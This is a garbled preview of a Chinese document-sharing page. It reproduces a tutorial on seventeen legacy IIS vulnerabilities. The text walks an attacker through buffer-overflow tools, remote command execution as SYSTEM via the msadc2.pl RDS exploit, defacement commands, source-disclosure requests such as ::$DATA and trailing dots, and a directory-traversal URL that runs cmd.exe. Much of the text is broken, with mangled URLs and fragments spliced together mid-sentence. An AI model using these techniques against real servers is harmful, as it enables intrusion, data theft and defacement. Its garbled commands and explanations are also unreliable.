iis的十七个常见安全漏洞

iis的十七个常见安全漏洞

ID:22691988

大小:59.50 KB

页数:7页

时间:2018-10-30

iis的十七个常见安全漏洞_第1页
iis的十七个常见安全漏洞_第2页
iis的十七个常见安全漏洞_第3页
iis的十七个常见安全漏洞_第4页
iis的十七个常见安全漏洞_第5页
资源描述:

《iis的十七个常见安全漏洞》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库

1、IIS的十七个常见安全漏洞  iis4hack缓冲溢出  主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面的站点.technotronic.去下载,另外你还需要一台自己的DAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDSDatafactory,默认情况下,它允许远程命令发送到IIS服务器中,这

2、命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help    [quackchatquack]$perlmsadc2.pl-h    --RDSsmackv2-rainforestpuppy/ADM/sadc.pl-h{-d-X-v}    -h=hostyouain)    -d=delaybetpIndexServerpathtable,ifavailable    -N=queryVbBusObjforNetBIOSname    -V=useVbB

3、usObjinsteadofActiveDataFactory    -v=verbose    -e=externaldictionaryfileforstep5    -u<hostsharefile>=useUNCfile    -ea(v2)mandsession    [quackchatquack]$perlmsadc2.pl-h    --RDSsmackv2-rainforestpuppy/ADM/andlineyoud/cassumed):    cmd/c    如果出现cmd/c后

4、,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:  echohackedbyme>d:ipubrootvictim  Codebrples/exair/hoples/exair/hosadc/samples/selector/shosadc/../../../../../p;%20CiRestriction=none%20%20CiHiliteType=full  p;.htatoftheQUERY_STRINGisinvalid这就表示你存在这个漏洞.这个问题主要就是ples/is

5、samples/oop/qfullhit.htples/issamples/oop/qsumrhit.htples/exair/search/qfullhit.htples/exair/search/qsumrhit.htisc/iirturnh.htw(这个一般为loopback使用)    一个攻击者可以使用如下的方法来访问系统中文件的内容:  .vi123下一页....,。ctim.iissamples/issamples/oop/qfullhit.htp;cirestriction=nonecihilite

6、type=full  就会在有此漏洞系统中s(::$DATA)要查看一些.asp文件的内容,你可以请求如下的URL:default.asp::$DATA你就得到了源代码  ASPDotBug  在请求的URL结尾追加一个或者多个点导致泄露ASP源代码。  sample.asp.  ISM.DLL  这个漏洞是由CerberusInformationSecurityteam.最早发现的,它运行在IIS4.0和5.0上面,允许攻击者查看任意文件内容和源代码。通过在文件名后面追加近230个+或者?%20?(这些表示空格)

7、并追加?.htr?的特殊请求给IIS,会使IIS认为客户端请求的是?.htr?文件,而.htr文件的后缀映射到ISM.DLLISAPI应用程序,这样IIS就把这个.htr请求转交给这个DLL文件,然后ISM.DLL程序把传递过来的文件打开和执行,但在ISM.DLL截断信息之前,缓冲区发送一个截断开的.Htr并会有一些时间去返回一些你要打开的文件内容.除非.DLL第一次装入内存时工作.NS发现追加+号到没有一次攻击这个问题,可以进行多次攻击。  idc.idaBugs  这个漏洞实际上类似ASPdot漏洞,其能在II

8、S4.0上显示其ples  通过请求site.csc,一般保存在/adsamples/config/site.csc中,攻击者可能获得一些如数据库中的DSN,UID和PASS的一些信息,如:  adsamples/config/site.csc  /iisadmpp32isrviisadmp32/cmd.exe?/c+dir  scripts/..%c0%a

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。